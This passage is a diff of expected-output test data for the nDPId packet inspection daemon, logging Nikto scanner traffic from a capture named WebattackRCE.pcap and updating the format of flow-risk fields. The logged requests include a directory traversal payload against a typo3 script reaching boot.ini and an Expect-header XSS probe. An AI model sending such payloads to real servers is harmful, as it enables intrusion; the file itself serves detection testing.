{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276827,"flow_last_seen":1576420276827,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49754,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1576420276827,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420276827,"pkt":"AAAAAAAAAAAAAAAACABFAADFTUVAAEAG7ut\/AAABfwAAAcJaH5CLBXV23SQCI4AYAED+uQAAAQEICp1m+4OdZvuDR0VUIC9pbmRleC5kbyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276827,"flow_last_seen":1576420276827,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49754,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.do","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276827,"flow_last_seen":1576420276827,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49754,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.do","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":107,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276828,"flow_last_seen":1576420276828,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49756,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1576420276828,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420276828,"pkt":"AAAAAAAAAAAAAAAACABFAADICi9AAEAGMf9\/AAABfwAAAcJcH5By6zIbQafp54AYAED+vAAAAQEICp1m+4SdZvuER0VUIC9pbmRleC5qaHRtbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276828,"flow_last_seen":1576420276828,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49756,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.jhtml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276828,"flow_last_seen":1576420276828,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49756,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.jhtml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276829,"flow_last_seen":1576420276829,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49758,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1576420276829,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"ts_msec":1576420276829,"pkt":"AAAAAAAAAAAAAAAACABFAADG08RAAEAGaGt\/AAABfwAAAcJeH5AOKuv2Y8ch84AYAED+ugAAAQEICp1m+4WdZvuFR0VUIC9pbmRleC5qc3AgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KDQo="}
-00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276829,"flow_last_seen":1576420276829,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49758,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.jsp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276829,"flow_last_seen":1576420276829,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49758,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.jsp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276832,"flow_last_seen":1576420276832,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49760,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1576420276832,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"ts_msec":1576420276832,"pkt":"AAAAAAAAAAAAAAAACABFAADGiDJAAEAGs\/1\/AAABfwAAAcJgH5Cj8LAJpHctpoAYAED+ugAAAQEICp1m+4edZvuHR0VUIC9pbmRleC54bWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276832,"flow_last_seen":1576420276832,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49760,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276832,"flow_last_seen":1576420276832,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49760,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":110,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276834,"flow_last_seen":1576420276834,"flow_idle_time":7440000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"ts_msec":1576420276834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49764,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1576420276834,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":240,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":240,"pkt_l4_len":206,"ts_msec":1576420276834,"pkt":"AAAAAAAAAAAAAAAACABFAADiGX1AAEAGIpd\/AAABfwAAAcJkH5BjVCFE0UHCd4AYAED+1gAAAQEICp1m+4qdZvuKR0VUIC9pbmRleCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om5lZ290aWF0ZSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdDogYXBwbGljYXRpb24vd2hhdGV2ZXI7IHE9MS4wDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":110,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276834,"flow_last_seen":1576420276834,"flow_idle_time":7440000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"ts_msec":1576420276834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49764,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:negotiate)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":110,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276834,"flow_last_seen":1576420276834,"flow_idle_time":7440000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"ts_msec":1576420276834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49764,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:negotiate)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":111,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276835,"flow_last_seen":1576420276835,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420276835,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49766,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1576420276835,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"ts_msec":1576420276835,"pkt":"AAAAAAAAAAAAAAAACABFAADKANNAAEAGO1l\/AAABfwAAAcJmH5BoODjpUSa4iYAYAED+vgAAAQEICp1m+4udZvuLR0VUIC9+YmluIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDphcGFjaGV1c2Vyczoga25vd24gdXNlcikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276835,"flow_last_seen":1576420276835,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420276835,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49766,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/~bin","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:apacheusers: known user)"}}
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276835,"flow_last_seen":1576420276835,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"ts_msec":1576420276835,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49766,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/~bin","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:apacheusers: known user)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":112,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276837,"flow_last_seen":1576420276837,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"ts_msec":1576420276837,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49768,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1576420276837,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"ts_msec":1576420276837,"pkt":"AAAAAAAAAAAAAAAACABFAADlgjNAAEAGud1\/AAABfwAAAcJoH5AFkroJ2Lkky4AYAED+2QAAAQEICp1m+42dZvuNR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KRXhwZWN0OiA8c2NyaXB0PmFsZXJ0KHhzcyk8L3NjcmlwdD4NClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDphcGFjaGVfZXhwZWN0X3hzcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276837,"flow_last_seen":1576420276837,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"ts_msec":1576420276837,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49768,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:apache_expect_xss)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276837,"flow_last_seen":1576420276837,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"ts_msec":1576420276837,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49768,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:apache_expect_xss)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276839,"flow_last_seen":1576420276839,"flow_idle_time":7440000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"ts_msec":1576420276839,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49770,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1576420276839,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":292,"pkt_l4_len":258,"ts_msec":1576420276839,"pkt":"AAAAAAAAAAAAAAAACABFAAEW4vNAAEAGWOx\/AAABfwAAAcJqH5CF6NrJzvbnOoAYAED\/CgAAAQEICp1m+4+dZvuOR0VUIC90eXBvMy9kZXYvdHJhbnNsYXRpb25zLnBocD9PTkxZPSUyZSUyZS8lMmUlMmUvJTJlJTJlLyUyZSUyZS8lMmUlMmUvYm9vdC5pbmklMDAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OkRpcmVjdG9yeSB0cmF2ZXJzYWwgY2hlY2spDQoNCg=="}
-00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276839,"flow_last_seen":1576420276839,"flow_idle_time":7440000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"ts_msec":1576420276839,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49770,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/boot.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}}
+01143{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276839,"flow_last_seen":1576420276839,"flow_idle_time":7440000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"ts_msec":1576420276839,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49770,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/typo3\/dev\/translations.php?ONLY=%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/boot.ini%00","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Directory traversal check)"}}
